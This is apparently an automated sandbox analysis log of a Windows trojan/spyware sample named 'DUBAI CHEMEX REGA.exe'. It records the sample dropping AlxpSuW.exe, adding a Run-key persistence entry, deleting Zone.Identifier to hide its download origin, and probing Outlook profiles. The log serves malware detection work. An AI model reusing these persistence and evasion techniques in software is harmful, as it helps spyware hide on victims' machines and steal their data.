                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06B60EB0
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06B60500
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_00F494A8
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_00F4DB4C
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_00F4C148
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_00F4E212
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_00F4A758
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC3CF8
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC02AD
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC026A
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC021B
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC0202
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC0040
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC0007
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 10_2_030D46E0
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 10_2_030D360C
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 10_2_030D4610
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 10_2_030D4650
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 10_2_030D4670
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 10_2_030D53D0
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 10_2_030DDA40
                      Source: DUBAI CHEMEX REGA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AlxpSuW.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.663766023.0000000001550000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.665376821.0000000004579000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.665376821.0000000004579000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLfPELLEPAheVvshnzUtYPtKgCCNRjmWTbvvQrd.exe4 vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664563832.000000000339A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.662435540.0000000000F40000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEventResetMode.exe: vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.670181231.00000000092F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.910320727.0000000000F60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000000.660758285.00000000008C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEventResetMode.exe: vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.909140573.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameLfPELLEPAheVvshnzUtYPtKgCCNRjmWTbvvQrd.exe4 vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.909540597.0000000000CF8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exe, 00000004.00000002.915897760.0000000005F70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exeBinary or memory string: OriginalFilenameEventResetMode.exe: vs DUBAI CHEMEX REGA.exe
                      Source: DUBAI CHEMEX REGA.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: DUBAI CHEMEX REGA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: AlxpSuW.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 4.2.DUBAI CHEMEX REGA.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.2.DUBAI CHEMEX REGA.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 10.2.AlxpSuW.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 10.2.AlxpSuW.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@2/1
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DUBAI CHEMEX REGA.exe.logJump to behavior
                      Source: DUBAI CHEMEX REGA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: DUBAI CHEMEX REGA.exeReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile read: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe 'C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe'
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess created: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe 'C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe'
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess created: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe 'C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe'
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess created: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess created: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: DUBAI CHEMEX REGA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DUBAI CHEMEX REGA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_07CA768F pushad ; retf 0007h
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC81A09 push eax; ret
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC814ED push cs; iretd
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC8149D push cs; ret
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 0_2_0EC814A1 push cs; iretd
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeCode function: 4_2_00F793FA push 8BFFFFFFh; retf
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06B14B3C pushfd ; ret
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06B12577 push 00000040h; ret
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_04D4C847 push ecx; ret
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_04D4F251 push 5E18468Bh; ret
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_04D47BF7 push E801005Eh; retf
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC14A1 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeCode function: 9_2_06DC1A09 push eax; ret
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.81409495243
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.81409495243
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile created: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeJump to dropped file
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AlxpSuWJump to behavior
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AlxpSuWJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeProcess information set: NOOPENFILEERRORBOX
